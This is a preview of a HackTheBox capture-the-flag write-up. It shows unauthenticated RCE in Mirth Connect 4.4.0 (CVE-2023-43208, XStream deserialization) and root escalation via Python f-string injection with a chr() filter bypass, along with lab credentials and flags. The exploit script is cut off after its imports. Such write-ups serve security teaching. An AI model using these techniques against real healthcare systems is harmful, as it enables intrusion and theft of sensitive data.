pentestfreemedium

Interpreter (Mirth Connect → f-string Injection)

hackthebox

Task: HackTheBox machine with Mirth Connect 4.4.0 healthcare integration engine. Solution: CVE-2023-43208 XStream deserialization for initial RCE as mirth user, then privilege escalation via Python f-string double eval injection in internal Flask service running as root, using chr() encoding to bypass regex filter.

$ ls tags/ techniques/

flask rce deserialization internal_service python_eval chr_encoding privesc mirth_connect cve-2023-43208 xstream fstring_injection hl7 healthcare regex_bypass

xstream_deserialization_rcefstring_double_evalchr_bypass_regexbase64_command_exfiltrationwget_post_file_exfilinternal_service_abusexml_injection_to_eval

$ cat /etc/rate-limit

Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.

Interpreter (Mirth Connect → f-string Injection) — HackTheBox

Description

Full machine on HackTheBox. Mirth Connect 4.4.0 (healthcare integration engine) with CVE-2023-43208 vulnerability for initial access, then privilege escalation via Python f-string injection in an internal Flask service running as root.

Target: 10.129.7.17
OS: Debian 12, kernel 6.1.0-43-amd64
Stack: Jetty (Mirth Connect 4.4.0), Flask/Werkzeug 2.2.2, MariaDB 10.5
Users: root, sedric (uid=1000), mirth (uid=103)

Flags

#	Type	Flag	Method
1	User	`b63665586c7eca1656d9f9b6b821e48a`	f-string injection → `open('/home/sedric/user.txt').read()`
2	Root	`9acc749ecf629eb2fa239153b8e2cacd`	f-string injection → `open('/root/root.txt').read()`

Reconnaissance

Nmap Scan

nmap -sV -sC -T4 -p- --min-rate=1000 10.129.7.17

Open ports:

22 — SSH (OpenSSH 9.2p1 Debian)
53 — DNS
80/443 — HTTP/HTTPS (Jetty — Mirth Connect Administrator 4.4.0)
6661 — Mirth TCP/HL7 Listener (MLLP protocol)

Internal services (discovered after initial access):

127.0.0.1:54321 — Flask/Werkzeug 2.2.2 (notif.py, runs as root)
127.0.0.1:3306 — MariaDB (credentials: mirthdb:MirthPass123!)

Identification

HTTP title: "Mirth Connect Administrator"
SSL cert CN: mirth-connect
Mirth Connect — open-source healthcare integration engine for routing HL7 messages
Version 4.4.0 is vulnerable to CVE-2023-43208 (pre-auth RCE)

Step 1: Initial Access — CVE-2023-43208 (XStream Deserialization RCE)

Mirth Connect 4.4.0 has a critical vulnerability CVE-2023-43208 — unauthenticated RCE via XStream deserialization in /api/users POST endpoint.

Vulnerability

Endpoint /api/users accepts XML without authentication
XStream parser deserializes arbitrary Java objects
Gadget chain: ChainedTransformer + InvokerTransformer + EventUtils$EventBindingInvocationHandler
Result: Runtime.getRuntime().exec(command) as user mirth

Exploit (rce.py)

#!/usr/bin/env python3
"""CVE-2023-43208 RCE helper - executes commands and exfiltrates output"""

import requests
import urllib3
import sys
import time
import threading
import base64 as b64
from http.server import HTTPServer, BaseHTTPRequestHandler

urllib3.disable_warnings()

...

$ grep --similar

Similar writeups

[web][free]Conversor (Full Box)— hackthebox
[pentest][free]WingData (Wing FTP RCE → Python tarfile PATH_MAX bypass)— hackthebox
[web][free]Browsed— hackthebox
[infra][free]Expressway— hackthebox
[web][free]DoxPit— hackthebox